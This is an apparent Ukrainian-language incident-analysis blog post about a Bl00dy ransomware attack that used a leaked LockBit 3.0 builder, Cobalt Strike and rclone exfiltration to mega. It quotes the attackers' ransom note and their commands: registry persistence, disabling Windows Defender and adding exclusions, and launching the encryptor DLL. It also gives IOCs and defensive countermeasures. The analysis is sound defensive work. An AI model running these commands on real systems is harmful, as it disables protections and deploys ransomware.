.bl00dy ransomware [UA]

(!) English version of this content can  be found here

 

Initial Access: N/A
Persistence: CobaltStrike, LOLbins
Credentials: LSASS Dump/PrivEscalation
Lateral: SMB, RDP
Exfil: rclone to mega
C2: CobaltStrike

Сьогодні (25.09.22) на аналіз було отримано вельми обмежену інформацію від однієї із українських жертв Bl00dy Ransomware Gang. На жаль, з наданих файлів не можливо встановити вектор втручання, часові рамки атаки та які операції були автоматизовані, а які проводилися в інтерактиві, проте інформації виявилося цілком достатньо для реконструкції схеми атаки.

https://twitter.com/tdatwja/status/1573776328486113281

Прошу ознайомитися і вжити відповідних заходів.

Коротка довідка:

Bl00dy ransomware gang – одне із угрупувань, що використовує тактику double extortion (крадуть і шифрують інформацію). Замість сайту з “стіною сорому” використовують Телеграм канал, де продають та/або публікують дані, якщо жертва відмовилась сплачувати викуп. Активна діяльність групи відстежується з липня поточного року. Детальніше (databreaches.net)

Вхідні дані:

Звернення жертви після виявлення факту спотворення файлів на одній із систем:

Реконструкція схеми атаки:

Виходячи з ransom note атрибуція нападників достатньо очевидна:

GREETINGS FROM BL00DY RANSOMWARE GANG
We download your company important files / documents / databases/ mails / accounts
We publish it to the public if you dont cooperate .
filedecryptionsupport@msgsafe.io
Telegram hall of shame , where all company private data will be PUBLISHED??
https://t.me/bl00dy_Ransomware_Gang
…

Але в той же час ID Ransomware пов’язує контактний email із Conti:

Враховуючи цікаву історію розпаду Conti та їх гучну операцію в Коста-Ріці, можна припустити, що таємниче угрупування #Bl00dy Ransomware Gang є одним із побічних проектів Conti, але перевіреної інформації, щоб підтвердити це поки немає.

update 26/09/22

З іншого боку, як влучно згадали @malwrhunterteam- раніше це угрупування використовувало Babuk, потім злитий Conti а тепер злитий LockBit

And you know what is the "best" about this "Bloody" ransomware gang? Previously they were using the leaked Conti ransomware…
🤦‍♂️
So, seems this skid gang is moving on to use the "newest and hottest" leaked ransomware as soon as they can.
😂 https://t.co/c3kgxZ27TX

— MalwareHunterTeam (@malwrhunterteam) September 26, 2022

Тепер перейдемо до встановлення ролей кожного із наданих зразків:

logs.bat [c:\windows\temp\] – запуск шифрування через DLL

:rundll32 C:\LB3_ReflectiveDll_DllMain-cyt.dll,gdll

reg.txt – постановка задачі на активацію скрипта logs.bat до входу в систему

reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce” /v notepad /t REG_SZ /d “c:\windows\temp\logs.bat”

wddd4.bat [c:\] – деактивація та видалення Windows Defender

powershell -command “Add-MpPreference -ExclusionPath ‘C:\Windows\temp'”
powershell -command “Add-MpPreference -ExclusionExtension “.exe””
powershell -command “Add-MpPreference -ExclusionPath ‘C:\'”
powershell -command “Add-MpPreference -ExclusionExtension “.dll””
Uninstall-WindowsFeature -Name Windows-Defender
reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v DisableAntiVirus /t REG_DWORD /d 1 /f
…
pause

rclone.conf – конфігураційний файл rclone (інструмент передачі файлів)

[remote]
type = mega
user = filedecryptionsupport@msgsafe.io
pass = ********************************

veeamsvr.exe [?] – rclone замаскований під службу veeam

VT

wget.exe [?] – версія інструменту wget під ОС Windows

VT

wmware-1.log [c:\windows\temp\] – Cobalt Strike Beacon (payload)

VT / Intezer

C2: 185.170.42{.} 93:80/g.pixel

LB3_ReflectiveDll_DllMain-cyt.dll [c:\] – тіло ransomware захищене WinLicense

VT / Intezer

Статичний аналіз DLL ідентифікує LockBit 3.0 builder, який було злито в мережу буквально на минулому тижні.

Що одразу кидається  в очі? Використання c:\windows\temp\ замість профілю користувача та виклик файлів з кореню диску С: – звичайний користувач туди писати/звертатись не може. Це означає, що або було підняття прав через сам Cobalt Strike, або ж втручання було здійснено через проміжний хост, з якого отримали хеш паролю адміністратора (дамп LSASS/Mimikatz).

Якщо розставити скрипти та інструментарій  нападників у логічній послідовності, то отримаємо  такий стан системи перед початком шифрування:

1. отримано віддалений контроль через запуск Cobalt Strike
2. для доставки необхідних інструментів скористались wget
3. крадіжка (upload) даних був здійснений через rclone на обліковий запис сервісу mega
4. Windows Defender було деактивовано скриптом
5. запуск шифрування був замаскований під обробку DLL, яка була ініційована вбудованим інструментом ОС reg через RunServicesOnce

Після завершення шифрування – файли спотворені, інформація викрадена, жертву очікує сплата викупу або ж оприлюднення вкраденого у каналі Телеграм.

У підсумку отримуємо наступний порядок активації скриптів та засобів наступний:

Контрзаходи:

• Сувора фільтрація Web та Email на предмет нетипового та/або потенційно шкідливих файлів (макроси, скрипти і т.ін.)
• Спеціальні політики (GPO/EPP) на заборону запуску вбудованих засобів ОС Windows (LOLBin)
• Використання NGFW/IPS для блокування трафіку Cobalt Strike
• Виявлення  та блокування команд rclone
• Блокування доступу до популярних файлових сховищ (на рівні NGFW/Web Proxy), які не регламентовані для використання в організації (Mega, onedrive, fex etc)
• Використання технологій типу Host IPS / Exploit Prevention для виявлення способів запуску/підгрузки сторонніх DLL
• Контроль внесення змін до реєстру (заборона зміни стану автозапуску)
• Використання РАМ для контролю за використанням облікових записів

Практичні поради:

Звіт справді не повний позаяк я мав справу лише з частиною артефактів і не мав можливості бачити журнали скомпрометованої ОС. Але ви повинні розуміти, що TTPs угрупувань на 90% автоматизовані, тому для перевірки політик ваших систем захисту нагадую базові речі:

• Cobalt Strike, a Defender’s Guide part 1, part  2
• Rclone detection [redcanary]
• SANS Ransomware Summit 2022, Can You Detect This?
• Trellix Insights: Daily C2: CobaltStrike [KB94406]
• Мистецтво захисту барʼєрів

Сподіваюсь ця інформація буде для вас вчасною та корисною.

Будьте здорові, уважні та обережні.
Вірте в ЗСУ.

Слава Україні.

#OptiData #InformationSecurity #Security
#Інформаційнабезпека #безпека #IOC #malware
#ransomware #bl00dy #cobaltstrike #rclone #DLL

VR